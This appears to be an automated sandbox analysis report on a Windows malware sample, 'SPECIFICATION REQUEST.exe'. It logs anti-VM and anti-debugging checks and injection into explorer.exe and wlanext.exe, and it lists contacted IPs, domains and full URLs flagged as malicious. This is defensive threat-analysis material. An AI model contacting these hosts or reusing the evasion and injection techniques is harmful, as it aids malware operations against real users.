Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 00000000005B98E4 second address: 00000000005B98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe	RDTSC instruction interceptor: First address: 00000000005B9B5E second address: 00000000005B9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe TID: 2964	Thread sleep time: -53196s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe TID: 1900	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6296	Thread sleep count: 58 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6296	Thread sleep time: -116000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe TID: 5976	Thread sleep time: -115000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: explorer.exe, 00000003.00000000.257604266.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000002.609573292.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.257313097.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.244322625.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000003.00000000.257707108.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000000.251927254.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000003.00000000.257313097.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.257313097.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.257707108.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: SPECIFICATION REQUEST.exe, 00000000.00000002.234689042.0000000002A35000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.257313097.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\explorer.exe	Network Connect: 194.245.148.189 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 64.92.125.40 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Thread register set: target process: 3472			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3472			Jump to behavior

Source: explorer.exe, 00000003.00000002.605318707.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000005.00000002.608110953.0000000004530000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.605318707.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000005.00000002.608110953.0000000004530000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.605318707.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000005.00000002.608110953.0000000004530000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000003.00000002.604591753.0000000001128000.00000004.00000020.sdmp	Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000003.00000002.605318707.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000005.00000002.608110953.0000000004530000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000002.605318707.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000005.00000002.608110953.0000000004530000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Queries volume information: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior

IP	Domain	Country	ASN	ASN Name	Malicious
194.245.148.189	unknown	Germany	5517	CSLDE	true
64.92.125.40	unknown	United States	21777	MASSIVE-NETWORKSUS	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true

Name	IP	Active
www.firstbyphone.com	194.245.148.189	true
bistrolartichaut.com	34.102.136.180	true
toprestau.com	64.92.125.40	true
www.bistrolartichaut.com	unknown	unknown
www.toprestau.com	unknown	unknown
www.douyzqdsgl.com	unknown	unknown
www.xn--fllessang-g3a.com	unknown	unknown
www.planterboxgardener.com	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://www.bistrolartichaut.com/gbr/?8p=FjoPdvK0HvW0&ExlPdj=Iv22WWjBKqQBYt0GN1Q3exOP7ZZ1MpJKXobvjkOcU9p13P0mNXwz/8InMIRVOTv7wUKT	true	Avira URL Cloud: safe	unknown
http://www.firstbyphone.com/gbr/?ExlPdj=9T+hwsCOJ30KUotVp56F2oUIcU+kzNAqslJ8t+71ysezeCdq1RydECu9CMdgx5D0Nzh8&8p=FjoPdvK0HvW0	true	Avira URL Cloud: safe	unknown
http://www.toprestau.com/gbr/?ExlPdj=nhAt8Z8LHJDSJ38oPYfO+brGMc7hoePPt0UT7/rkXoSmXfJRpMQb8gX/3j1aoGmg1yg5&8p=FjoPdvK0HvW0	true	Avira URL Cloud: safe	unknown

Analysis Report SPECIFICATION REQUEST.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

ID:	344818
Product:	CloudBasic
Start time:	07:57:13
Start date:	27.01.2021
Sample:	SPECIFICATION REQUEST.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	e7d7f8b02dd023f31b46e5bb265c7224
SHA1:	95e91ec34debdc0e4817d90caca87897f4febe98
SHA256:	fc534d33f183a321a447fef1fdef4c8a7fa78413cd15f93df13a39f0a8b9b2fe
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.80%